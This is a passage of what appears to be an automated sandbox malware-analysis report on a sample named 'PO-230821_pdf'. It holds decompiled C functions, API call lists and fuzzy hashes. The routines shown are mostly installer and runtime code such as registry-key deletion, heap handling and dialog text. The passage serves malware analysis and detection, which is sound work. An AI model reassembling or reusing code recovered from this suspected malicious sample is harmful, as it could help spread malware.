                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                            				char _v68;
                                            				char _v132;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t23;
                                            				signed int _t24;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t34;
                                            				void* _t44;
                                            				signed int _t46;
                                            				signed int _t50;
                                            				signed int _t52;
                                            				signed int _t53;
                                            				signed int _t55;
                                            
                                            				_t23 = _a16;
                                            				_t53 = _a12;
                                            				_t44 = 0xffffffdc;
                                            				if(_t23 == 0) {
                                            					_push(0x14);
                                            					_pop(0);
                                            					_t24 = _t53;
                                            					if(_t53 < 0x100000) {
                                            						_push(0xa);
                                            						_pop(0);
                                            						_t44 = 0xffffffdd;
                                            					}
                                            					if(_t53 < 0x400) {
                                            						_t44 = 0xffffffde;
                                            					}
                                            					if(_t53 < 0xffff3333) {
                                            						_t52 = 0x14;
                                            						asm("cdq");
                                            						_t24 = 1 / _t52 + _t53;
                                            					}
                                            					_t25 = _t24 & 0x00ffffff;
                                            					_t55 = _t24 >> 0;
                                            					_t46 = 0xa;
                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                            				} else {
                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                            					_t50 = 0;
                                            				}
                                            				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                            				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                            				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                            				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                            				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                            			}



















                                            0x00404e7a
                                            0x00404e7f
                                            0x00404e87
                                            0x00404e88
                                            0x00404e95
                                            0x00404e9d
                                            0x00404e9e
                                            0x00404ea0
                                            0x00404ea2
                                            0x00404ea4
                                            0x00404ea7
                                            0x00404ea7
                                            0x00404eae
                                            0x00404eb4
                                            0x00404eb4
                                            0x00404ebb
                                            0x00404ec2
                                            0x00404ec5
                                            0x00404ec8
                                            0x00404ec8
                                            0x00404ecc
                                            0x00404edc
                                            0x00404ede
                                            0x00404ee1
                                            0x00404e8a
                                            0x00404e8a
                                            0x00404e91
                                            0x00404e91
                                            0x00404ee9
                                            0x00404ef4
                                            0x00404f0a
                                            0x00404f1b
                                            0x00404f37

                                            APIs
                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                            • wsprintfW.USER32 ref: 00404F1B
                                            • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$H7B
                                            • API String ID: 3540041739-107966168
                                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                            				void* _v8;
                                            				int _v12;
                                            				short _v536;
                                            				void* _t27;
                                            				signed int _t33;
                                            				intOrPtr* _t35;
                                            				signed int _t45;
                                            				signed int _t46;
                                            				signed int _t47;
                                            
                                            				_t46 = _a12;
                                            				_t47 = _t46 & 0x00000300;
                                            				_t45 = _t46 & 0x00000001;
                                            				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                            				if(_t27 == 0) {
                                            					if((_a12 & 0x00000002) == 0) {
                                            						L3:
                                            						_push(0x105);
                                            						_push( &_v536);
                                            						_push(0);
                                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                            							__eflags = _t45;
                                            							if(__eflags != 0) {
                                            								L10:
                                            								RegCloseKey(_v8);
                                            								return 0x3eb;
                                            							}
                                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                            							__eflags = _t33;
                                            							if(_t33 != 0) {
                                            								break;
                                            							}
                                            							_push(0x105);
                                            							_push( &_v536);
                                            							_push(_t45);
                                            						}
                                            						RegCloseKey(_v8);
                                            						_t35 = E00406A35(3);
                                            						if(_t35 != 0) {
                                            							return  *_t35(_a4, _a8, _t47, 0);
                                            						}
                                            						return RegDeleteKeyW(_a4, _a8);
                                            					}
                                            					_v12 = 0;
                                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                            						goto L10;
                                            					}
                                            					goto L3;
                                            				}
                                            				return _t27;
                                            			}












                                            0x00402eb4
                                            0x00402ebd
                                            0x00402ec6
                                            0x00402ed2
                                            0x00402edb
                                            0x00402ee5
                                            0x00402f0a
                                            0x00402f10
                                            0x00402f15
                                            0x00402f16
                                            0x00402f46
                                            0x00402f1f
                                            0x00402f21
                                            0x00402f71
                                            0x00402f74
                                            0x00000000
                                            0x00402f7a
                                            0x00402f30
                                            0x00402f35
                                            0x00402f37
                                            0x00000000
                                            0x00000000
                                            0x00402f3f
                                            0x00402f44
                                            0x00402f45
                                            0x00402f45
                                            0x00402f52
                                            0x00402f5a
                                            0x00402f61
                                            0x00000000
                                            0x00402f8a
                                            0x00000000
                                            0x00402f69
                                            0x00402ef5
                                            0x00402f08
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402f08
                                            0x00402f90

                                            APIs
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E00401D81(void* __ebx, void* __edx) {
                                            				struct HWND__* _t30;
                                            				WCHAR* _t38;
                                            				void* _t48;
                                            				void* _t53;
                                            				signed int _t55;
                                            				signed int _t60;
                                            				long _t63;
                                            				void* _t65;
                                            
                                            				_t53 = __ebx;
                                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                            				} else {
                                            					E00402D84(2);
                                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                            				}
                                            				_t55 =  *(_t65 - 0x24);
                                            				 *(_t65 + 8) = _t30;
                                            				_t60 = _t55 & 0x00000004;
                                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                            				if((_t55 & 0x00010000) == 0) {
                                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                            				} else {
                                            					_t38 = E00402DA6(0x11);
                                            				}
                                            				 *(_t65 - 0x44) = _t38;
                                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                            				asm("sbb esi, esi");
                                            				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                            					DeleteObject(_t48);
                                            				}
                                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                            					_push(_t63);
                                            					E004065AF();
                                            				}
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                            				return 0;
                                            			}











                                            0x00401d81
                                            0x00401d85
                                            0x00401d9a
                                            0x00401d87
                                            0x00401d89
                                            0x00401d8f
                                            0x00401d8f
                                            0x00401da0
                                            0x00401da3
                                            0x00401dad
                                            0x00401db0
                                            0x00401db8
                                            0x00401dc9
                                            0x00401dcc
                                            0x00401dd7
                                            0x00401dce
                                            0x00401dd0
                                            0x00401dd0
                                            0x00401ddb
                                            0x00401de5
                                            0x00401e0c
                                            0x00401e1b
                                            0x00401e29
                                            0x00401e31
                                            0x00401e39
                                            0x00401e39
                                            0x00401e42
                                            0x00401e48
                                            0x00402ba4
                                            0x00402ba4
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E1000454D(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                            				void* _t7;
                                            				long _t8;
                                            				intOrPtr* _t9;
                                            				intOrPtr* _t12;
                                            				long _t20;
                                            				long _t31;
                                            
                                            				if(_a4 != 0) {
                                            					_t31 = _a8;
                                            					__eflags = _t31;
                                            					if(_t31 != 0) {
                                            						_push(__ebx);
                                            						while(1) {
                                            							__eflags = _t31 - 0xffffffe0;
                                            							if(_t31 > 0xffffffe0) {
                                            								break;
                                            							}
                                            							__eflags = _t31;
                                            							if(_t31 == 0) {
                                            								_t31 = _t31 + 1;
                                            								__eflags = _t31;
                                            							}
                                            							_t7 = HeapReAlloc( *0x1000bf00, 0, _a4, _t31);
                                            							_t20 = _t7;
                                            							__eflags = _t20;
                                            							if(_t20 != 0) {
                                            								L17:
                                            								_t8 = _t20;
                                            							} else {
                                            								__eflags =  *0x1000c810 - _t7;
                                            								if(__eflags == 0) {
                                            									_t9 = E10003A67(__eflags);
                                            									 *_t9 = E10003A7A(GetLastError());
                                            									goto L17;
                                            								} else {
                                            									__eflags = E10003D9F(_t7, _t31);
                                            									if(__eflags == 0) {
                                            										_t12 = E10003A67(__eflags);
                                            										 *_t12 = E10003A7A(GetLastError());
                                            										L12:
                                            										_t8 = 0;
                                            										__eflags = 0;
                                            									} else {
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            							goto L14;
                                            						}
                                            						E10003D9F(_t6, _t31);
                                            						 *((intOrPtr*)(E10003A67(__eflags))) = 0xc;
                                            						goto L12;
                                            					} else {
                                            						E10002511(_a4);
                                            						_t8 = 0;
                                            					}
                                            					L14:
                                            					return _t8;
                                            				} else {
                                            					return E100044BB(__ebx, __edx, __edi, _a8);
                                            				}
                                            			}









                                            0x10004554
                                            0x10004562
                                            0x10004565
                                            0x10004567
                                            0x10004576
                                            0x100045a9
                                            0x100045a9
                                            0x100045ac
                                            0x00000000
                                            0x00000000
                                            0x10004579
                                            0x1000457b
                                            0x1000457d
                                            0x1000457d
                                            0x1000457d
                                            0x1000458a
                                            0x10004590
                                            0x10004592
                                            0x10004594
                                            0x100045f4
                                            0x100045f4
                                            0x10004596
                                            0x10004596
                                            0x1000459c
                                            0x100045de
                                            0x100045f2
                                            0x00000000
                                            0x1000459e
                                            0x100045a5
                                            0x100045a7
                                            0x100045c6
                                            0x100045da
                                            0x100045c0
                                            0x100045c0
                                            0x100045c0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100045a7
                                            0x1000459c
                                            0x00000000
                                            0x100045c2
                                            0x100045af
                                            0x100045ba
                                            0x00000000
                                            0x10004569
                                            0x1000456c
                                            0x10004572
                                            0x10004572
                                            0x100045c3
                                            0x100045c5
                                            0x10004556
                                            0x10004560
                                            0x10004560

                                            APIs
                                            • _malloc.LIBCMT ref: 10004559
                                              • Part of subcall function 100044BB: __FF_MSGBANNER.LIBCMT ref: 100044D2
                                              • Part of subcall function 100044BB: __NMSG_WRITE.LIBCMT ref: 100044D9
                                              • Part of subcall function 100044BB: HeapAlloc.KERNEL32(00570000,00000000,00000001,00000000,?,00000000,?,10002780,?,?,?,?,?,10002AFE,00000018,10009B80), ref: 100044FE
                                            • _free.LIBCMT ref: 1000456C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: AllocHeap_free_malloc
                                            • String ID:
                                            • API String ID: 2734353464-0
                                            • Opcode ID: 79715a70deefa15e6e5ea9d46a0df7f71a35c20fbb44ae7ad5dd88d8a19d84a4
                                            • Instruction ID: 19cb2b43c1f7cb45267d19525e7b4d124c53bcd19f4e80a8a756fb5b7eef4191
                                            • Opcode Fuzzy Hash: 79715a70deefa15e6e5ea9d46a0df7f71a35c20fbb44ae7ad5dd88d8a19d84a4
                                            • Instruction Fuzzy Hash: A411EBB2904F26AFFB21DF74AC4574E37C8EF002E1F128525F9488615EDF349A408699
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E1000323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                            				LONG* _t20;
                                            				signed int _t25;
                                            				void* _t31;
                                            				LONG* _t33;
                                            				void* _t34;
                                            				void* _t35;
                                            
                                            				_t35 = __eflags;
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_push(0xc);
                                            				_push(0x10009bc0);
                                            				E10002840(__ebx, __edi, __esi);
                                            				_t31 = E100018F4(__edx, __edi, _t35);
                                            				_t25 =  *0x1000be10; // 0xfffffffe
                                            				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                            					E10002A35(0xd);
                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                            					_t33 =  *(_t31 + 0x68);
                                            					 *(_t34 - 0x1c) = _t33;
                                            					__eflags = _t33 -  *0x1000b4c4; // 0x1000b7c0
                                            					if(__eflags != 0) {
                                            						__eflags = _t33;
                                            						if(__eflags != 0) {
                                            							__eflags = InterlockedDecrement(_t33);
                                            							if(__eflags == 0) {
                                            								__eflags = _t33 - 0x1000b7c0;
                                            								if(__eflags != 0) {
                                            									E10002511(_t33);
                                            								}
                                            							}
                                            						}
                                            						_t20 =  *0x1000b4c4; // 0x1000b7c0
                                            						 *(_t31 + 0x68) = _t20;
                                            						_t33 =  *0x1000b4c4; // 0x1000b7c0
                                            						 *(_t34 - 0x1c) = _t33;
                                            						InterlockedIncrement(_t33);
                                            					}
                                            					 *(_t34 - 4) = 0xfffffffe;
                                            					E100032D9();
                                            				} else {
                                            					_t33 =  *(_t31 + 0x68);
                                            				}
                                            				_t38 = _t33;
                                            				if(_t33 == 0) {
                                            					E10001C09(_t24, _t29, _t31, _t33, _t38, 0x20);
                                            				}
                                            				return E10002885(_t33);
                                            			}









                                            0x1000323d
                                            0x1000323d
                                            0x1000323d
                                            0x1000323d
                                            0x1000323f
                                            0x10003244
                                            0x1000324e
                                            0x10003250
                                            0x10003259
                                            0x1000327a
                                            0x10003280
                                            0x10003284
                                            0x10003287
                                            0x1000328a
                                            0x10003290
                                            0x10003292
                                            0x10003294
                                            0x1000329d
                                            0x1000329f
                                            0x100032a1
                                            0x100032a7
                                            0x100032aa
                                            0x100032af
                                            0x100032a7
                                            0x1000329f
                                            0x100032b0
                                            0x100032b5
                                            0x100032b8
                                            0x100032be
                                            0x100032c2
                                            0x100032c2
                                            0x100032c8
                                            0x100032cf
                                            0x10003261
                                            0x10003261
                                            0x10003261
                                            0x10003264
                                            0x10003266
                                            0x1000326a
                                            0x1000326f
                                            0x10003277

                                            APIs
                                              • Part of subcall function 100018F4: __getptd_noexit.LIBCMT ref: 100018F5
                                              • Part of subcall function 100018F4: __amsg_exit.LIBCMT ref: 10001902
                                            • __amsg_exit.LIBCMT ref: 1000326A
                                            • __lock.LIBCMT ref: 1000327A
                                            • InterlockedDecrement.KERNEL32(?), ref: 10003297
                                            • _free.LIBCMT ref: 100032AA
                                            • InterlockedIncrement.KERNEL32(1000B7C0), ref: 100032C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                            • String ID:
                                            • API String ID: 1231874560-0
                                            • Opcode ID: 6560743187c80d76e2a816ea093f7de185fdedfc0b6097cbaa1231269ae894d6
                                            • Instruction ID: b3878dd355b614d152379542394d216700b7b41a6a0363afd7efb2b57158836b
                                            • Opcode Fuzzy Hash: 6560743187c80d76e2a816ea093f7de185fdedfc0b6097cbaa1231269ae894d6
                                            • Instruction Fuzzy Hash: 78015E35901A21ABFA42DB64894674F77A4FF047D1F11C149E80467299CB346A41CBD5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E00401E4E(intOrPtr __edx) {
                                            				void* __edi;
                                            				int _t9;
                                            				signed char _t15;
                                            				struct HFONT__* _t18;
                                            				intOrPtr _t30;
                                            				void* _t31;
                                            				struct HDC__* _t33;
                                            				void* _t35;
                                            
                                            				_t30 = __edx;
                                            				_t33 = GetDC( *(_t35 - 8));
                                            				_t9 = E00402D84(2);
                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                            				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                            				ReleaseDC( *(_t35 - 8), _t33);
                                            				 *0x40ce08 = E00402D84(3);
                                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                            				 *0x40ce0f = 1;
                                            				 *0x40ce0c = _t15 & 0x00000001;
                                            				 *0x40ce0d = _t15 & 0x00000002;
                                            				 *0x40ce0e = _t15 & 0x00000004;
                                            				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                            				_t18 = CreateFontIndirectW(0x40cdf8);
                                            				_push(_t18);
                                            				_push(_t31);
                                            				E004065AF();
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                            				return 0;
                                            			}











                                            0x00401e4e
                                            0x00401e59
                                            0x00401e5b
                                            0x00401e68
                                            0x00401e7f
                                            0x00401e84
                                            0x00401e91
                                            0x00401e96
                                            0x00401e9a
                                            0x00401ea5
                                            0x00401eac
                                            0x00401ebe
                                            0x00401ec4
                                            0x00401ec9
                                            0x00401ed3
                                            0x00402638
                                            0x0040156d
                                            0x00402ba4
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • GetDC.USER32(?), ref: 00401E51
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Fosklcks,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Fosklcks,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2584051700-0
                                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E00401C43(intOrPtr __edx) {
                                            				int _t29;
                                            				long _t30;
                                            				signed int _t32;
                                            				WCHAR* _t35;
                                            				long _t36;
                                            				int _t41;
                                            				signed int _t42;
                                            				int _t46;
                                            				int _t56;
                                            				intOrPtr _t57;
                                            				struct HWND__* _t63;
                                            				void* _t64;
                                            
                                            				_t57 = __edx;
                                            				_t29 = E00402D84(3);
                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                            				 *(_t64 - 0x18) = _t29;
                                            				_t30 = E00402D84(4);
                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                            				 *(_t64 + 8) = _t30;
                                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                            				}
                                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                            					 *(_t64 + 8) = E00402DA6(0x44);
                                            				}
                                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                            				_push(1);
                                            				if(__eflags != 0) {
                                            					_t61 = E00402DA6();
                                            					_t32 = E00402DA6();
                                            					asm("sbb ecx, ecx");
                                            					asm("sbb eax, eax");
                                            					_t35 =  ~( *_t31) & _t61;
                                            					__eflags = _t35;
                                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                            					goto L10;
                                            				} else {
                                            					_t63 = E00402D84();
                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
